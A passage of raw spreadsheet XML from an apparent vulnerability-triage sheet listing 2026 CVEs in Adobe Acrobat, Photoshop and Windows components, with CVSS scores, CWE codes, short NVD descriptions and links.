r="K665" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L665" s="5" t="inlineStr" /><c r="M665" s="5" t="inlineStr" /><c r="N665" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P665" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q665" s="5" t="inlineStr" /><c r="R665" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S665" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T665" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t></is></c></row><row r="666"><c r="A666" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C666" s="5" t="inlineStr"><is><t>CVE-2026-81989</t></is></c><c r="D666" s="5" t="n"><v>7.8</v></c><c r="E666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F666" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G666" s="5" t="inlineStr" /><c r="H666" s="5" t="n"><v>0.002</v></c><c r="I666" s="5" t="inlineStr" /><c r="J666" s="5" t="inlineStr" /><c r="K666" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L666" s="5" t="inlineStr" /><c r="M666" s="5" t="inlineStr" /><c r="N666" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P666" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q666" s="5" t="inlineStr" /><c r="R666" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S666" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T666" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t></is></c></row><row r="667"><c r="A667" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C667" s="5" t="inlineStr"><is><t>CVE-2026-81990</t></is></c><c r="D667" s="5" t="n"><v>7.8</v></c><c r="E667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F667" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G667" s="5" t="inlineStr" /><c r="H667" s="5" t="n"><v>0.002</v></c><c r="I667" s="5" t="inlineStr" /><c r="J667" s="5" t="inlineStr" /><c r="K667" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L667" s="5" t="inlineStr" /><c r="M667" s="5" t="inlineStr" /><c r="N667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P667" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q667" s="5" t="inlineStr" /><c r="R667" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S667" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T667" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t></is></c></row><row r="668"><c r="A668" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C668" s="5" t="inlineStr"><is><t>CVE-2026-81992</t></is></c><c r="D668" s="5" t="n"><v>7.8</v></c><c r="E668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F668" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G668" s="5" t="inlineStr" /><c r="H668" s="5" t="n"><v>0.002</v></c><c r="I668" s="5" t="inlineStr" /><c r="J668" s="5" t="inlineStr" /><c r="K668" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L668" s="5" t="inlineStr" /><c r="M668" s="5" t="inlineStr" /><c r="N668" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P668" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q668" s="5" t="inlineStr" /><c r="R668" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S668" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T668" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t></is></c></row><row r="669"><c r="A669" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C669" s="5" t="inlineStr"><is><t>CVE-2026-82005</t></is></c><c r="D669" s="5" t="n"><v>7.8</v></c><c r="E669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F669" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G669" s="5" t="inlineStr" /><c r="H669" s="5" t="n"><v>0.002</v></c><c r="I669" s="5" t="inlineStr" /><c r="J669" s="5" t="inlineStr" /><c r="K669" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L669" s="5" t="inlineStr" /><c r="M669" s="5" t="inlineStr" /><c r="N669" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P669" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q669" s="5" t="inlineStr" /><c r="R669" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S669" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T669" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t></is></c></row><row r="670"><c r="A670" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C670" s="5" t="inlineStr"><is><t>CVE-2026-82006</t></is></c><c r="D670" s="5" t="n"><v>7.8</v></c><c r="E670" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F670" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G670" s="5" t="inlineStr" /><c r="H670" s="5" t="n"><v>0.002</v></c><c r="I670" s="5" t="inlineStr" /><c r="J670" s="5" t="inlineStr" /><c r="K670" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L670" s="5" t="inlineStr" /><c r="M670" s="5" t="inlineStr" /><c r="N670" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P670" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q670" s="5" t="inlineStr" /><c r="R670" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S670" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T670" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t></is></c></row><row r="671"><c r="A671" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C671" s="5" t="inlineStr"><is><t>CVE-2026-82007</t></is></c><c r="D671" s="5" t="n"><v>7.8</v></c><c r="E671" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F671" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G671" s="5" t="inlineStr" /><c r="H671" s="5" t="n"><v>0.002</v></c><c r="I671" s="5" t="inlineStr" /><c r="J671" s="5" t="inlineStr" /><c r="K671" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L671" s="5" t="inlineStr" /><c r="M671" s="5" t="inlineStr" /><c r="N671" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P671" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q671" s="5" t="inlineStr" /><c r="R671" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S67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71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t></is></c></row><row r="672"><c r="A672" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C672" s="5" t="inlineStr"><is><t>CVE-2026-83498</t></is></c><c r="D672" s="5" t="n"><v>7.8</v></c><c r="E672" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F672" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G672" s="5" t="inlineStr" /><c r="H672" s="5" t="n"><v>0.003</v></c><c r="I672" s="5" t="inlineStr" /><c r="J672" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K672" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L672" s="5" t="inlineStr" /><c r="M672" s="5" t="inlineStr" /><c r="N672" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P672" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q672" s="5" t="inlineStr" /><c r="R672" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S672" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T672" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t></is></c></row><row r="673"><c r="A673" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C673" s="5" t="inlineStr"><is><t>CVE-2026-83942</t></is></c><c r="D673" s="5" t="n"><v>7.8</v></c><c r="E673" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F673" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G673" s="5" t="inlineStr" /><c r="H673" s="5" t="n"><v>0.002</v></c><c r="I673" s="5" t="inlineStr" /><c r="J673" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K673"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673" s="5" t="inlineStr" /><c r="M673" s="5" t="inlineStr" /><c r="N673" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P673" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q673" s="5" t="inlineStr" /><c r="R673" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S673" s="5" t="inlineStr"><is><t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T673" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t></is></c></row><row r="674"><c r="A674" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C674" s="5" t="inlineStr"><is><t>CVE-2026-83952</t></is></c><c r="D674" s="5" t="n"><v>7.8</v></c><c r="E674" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F674" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G674" s="5" t="inlineStr" /><c r="H674" s="5" t="n"><v>0.002</v></c><c r="I674" s="5" t="inlineStr" /><c r="J674" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K674" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L674" s="5" t="inlineStr" /><c r="M674" s="5" t="inlineStr" /><c r="N674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P674" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q674" s="5" t="inlineStr" /><c r="R674" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S674" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T674" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t></is></c></row><row r="675"><c r="A675" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C675" s="5" t="inlineStr"><is><t>CVE-2026-83954</t></is></c><c r="D675" s="5" t="n"><v>7.8</v></c><c r="E675" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F675" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G675" s="5" t="inlineStr" /><c r="H675" s="5" t="n"><v>0.003</v></c><c r="I675" s="5" t="inlineStr" /><c r="J675" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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5" s="5" t="inlineStr" /><c r="M675" s="5" t="inlineStr" /><c r="N675" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P675" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q675" s="5" t="inlineStr" /><c r="R675" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S675" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T675" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t></is></c></row><row r="676"><c r="A676" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C676" s="5" t="inlineStr"><is><t>CVE-2026-83955</t></is></c><c r="D676" s="5" t="n"><v>7.8</v></c><c r="E676" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F676" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G676" s="5" t="inlineStr" /><c r="H676" s="5" t="n"><v>0.002</v></c><c r="I676" s="5" t="inlineStr" /><c r="J676" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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6" s="5" t="inlineStr" /><c r="M676" s="5" t="inlineStr" /><c r="N676" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P676" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q676" s="5" t="inlineStr" /><c r="R676" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S676" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T676" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t></is></c></row><row r="677"><c r="A677" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C677" s="5" t="inlineStr"><is><t>CVE-2026-83967</t></is></c><c r="D677" s="5" t="n"><v>7.8</v></c><c r="E677" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F677" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G677" s="5" t="inlineStr" /><c r="H677" s="5" t="n"><v>0.003</v></c><c r="I677" s="5" t="inlineStr" /><c r="J677" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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7" s="5" t="inlineStr" /><c r="M677" s="5" t="inlineStr" /><c r="N677" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P677" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q677" s="5" t="inlineStr" /><c r="R677" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S677" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T677" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t></is></c></row><row r="678"><c r="A678" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C678" s="5" t="inlineStr"><is><t>CVE-2026-83968</t></is></c><c r="D678" s="5" t="n"><v>7.8</v></c><c r="E678" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F678" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G678" s="5" t="inlineStr" /><c r="H678" s="5" t="n"><v>0.003</v></c><c r="I678" s="5" t="inlineStr" /><c r="J678" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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8" s="5" t="inlineStr" /><c r="M678" s="5" t="inlineStr" /><c r="N678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P678" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q678" s="5" t="inlineStr" /><c r="R678" s="5" t="inlineStr"><is><t>CWE-400, CWE-416</t></is></c><c r="S678" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T678" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t></is></c></row><row r="679"><c r="A679" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C679" s="5" t="inlineStr"><is><t>CVE-2026-83969</t></is></c><c r="D679" s="5" t="n"><v>7.8</v></c><c r="E679" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F679" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G679" s="5" t="inlineStr" /><c r="H679" s="5" t="n"><v>0.002</v></c><c r="I679" s="5" t="inlineStr" /><c r="J679" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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9" s="5" t="inlineStr" /><c r="M679" s="5" t="inlineStr" /><c r="N679" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P679" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q679" s="5" t="inlineStr" /><c r="R679" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S679" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T679" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t></is></c></row><row r="680"><c r="A680" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B680" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C680" s="5" t="inlineStr"><is><t>CVE-2026-83970</t></is></c><c r="D680" s="5" t="n"><v>7.8</v></c><c r="E680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F680" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G680" s="5" t="inlineStr" /><c r="H680" s="5" t="n"><v>0.003</v></c><c r="I680" s="5" t="inlineStr" /><c r="J680" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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0" s="5" t="inlineStr" /><c r="M680" s="5" t="inlineStr" /><c r="N680" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O680" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P680" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q680" s="5" t="inlineStr" /><c r="R680" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S680" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t></is></c></row><row r="681"><c r="A681" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B681" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C681" s="5" t="inlineStr"><is><t>CVE-2026-83971</t></is></c><c r="D681" s="5" t="n"><v>7.8</v></c><c r="E681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F681" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G681" s="5" t="inlineStr" /><c r="H681" s="5" t="n"><v>0.003</v></c><c r="I681" s="5" t="inlineStr" /><c r="J681" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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1" s="5" t="inlineStr" /><c r="M681" s="5" t="inlineStr" /><c r="N681" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O681" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P681" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q681" s="5" t="inlineStr" /><c r="R681" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S681" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t></is></c></row><row r="682"><c r="A682" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B682" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C682" s="5" t="inlineStr"><is><t>CVE-2026-83972</t></is></c><c r="D682" s="5" t="n"><v>7.8</v></c><c r="E682" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F682" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G682" s="5" t="inlineStr" /><c r="H682" s="5" t="n"><v>0.003</v></c><c r="I682" s="5" t="inlineStr" /><c r="J682" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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2" s="5" t="inlineStr" /><c r="M682" s="5" t="inlineStr" /><c r="N682" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O682" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P682" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q682" s="5" t="inlineStr" /><c r="R682" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S682" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t></is></c></row><row r="683"><c r="A683" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B683" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C683" s="5" t="inlineStr"><is><t>CVE-2026-83973</t></is></c><c r="D683" s="5" t="n"><v>7.8</v></c><c r="E683" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F683" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G683" s="5" t="inlineStr" /><c r="H683" s="5" t="n"><v>0.003</v></c><c r="I683" s="5" t="inlineStr" /><c r="J683" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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3" s="5" t="inlineStr" /><c r="M683" s="5" t="inlineStr" /><c r="N683" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O683" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P683" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q683" s="5" t="inlineStr" /><c r="R683" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S683" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t></is></c></row><row r="684"><c r="A684" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B684" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C684" s="5" t="inlineStr"><is><t>CVE-2026-83974</t></is></c><c r="D684" s="5" t="n"><v>7.8</v></c><c r="E684" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F684" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G684" s="5" t="inlineStr" /><c r="H684" s="5" t="n"><v>0.002</v></c><c r="I684" s="5" t="inlineStr" /><c r="J684" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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4" s="5" t="inlineStr" /><c r="M684" s="5" t="inlineStr" /><c r="N684" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O684" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P684" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q684" s="5" t="inlineStr" /><c r="R684" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S684" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t></is></c></row><row r="685"><c r="A685" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B685" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C685" s="5" t="inlineStr"><is><t>CVE-2026-83975</t></is></c><c r="D685" s="5" t="n"><v>7.8</v></c><c r="E685" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F685" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G685" s="5" t="inlineStr" /><c r="H685" s="5" t="n"><v>0.003</v></c><c r="I685" s="5" t="inlineStr" /><c r="J685" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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5" s="5" t="inlineStr" /><c r="M685" s="5" t="inlineStr" /><c r="N685" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O685" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P685" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q685" s="5" t="inlineStr" /><c r="R685" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S685" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t></is></c></row><row r="686"><c r="A686" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B686" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C686" s="5" t="inlineStr"><is><t>CVE-2026-83976</t></is></c><c r="D686" s="5" t="n"><v>7.8</v></c><c r="E686" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F686" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G686" s="5" t="inlineStr" /><c r="H686" s="5" t="n"><v>0.002</v></c><c r="I686" s="5" t="inlineStr" /><c r="J686" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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6" s="5" t="inlineStr" /><c r="M686" s="5" t="inlineStr" /><c r="N686" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O686" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P686" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q686" s="5" t="inlineStr" /><c r="R686" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S686" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t></is></c></row><row r="687"><c r="A687" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B687" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C687" s="5" t="inlineStr"><is><t>CVE-2026-83977</t></is></c><c r="D687" s="5" t="n"><v>7.8</v></c><c r="E687" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F687" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G687" s="5" t="inlineStr" /><c r="H687" s="5" t="n"><v>0.003</v></c><c r="I687" s="5" t="inlineStr" /><c r="J687" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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7" s="5" t="inlineStr" /><c r="M687" s="5" t="inlineStr" /><c r="N687" s="5" 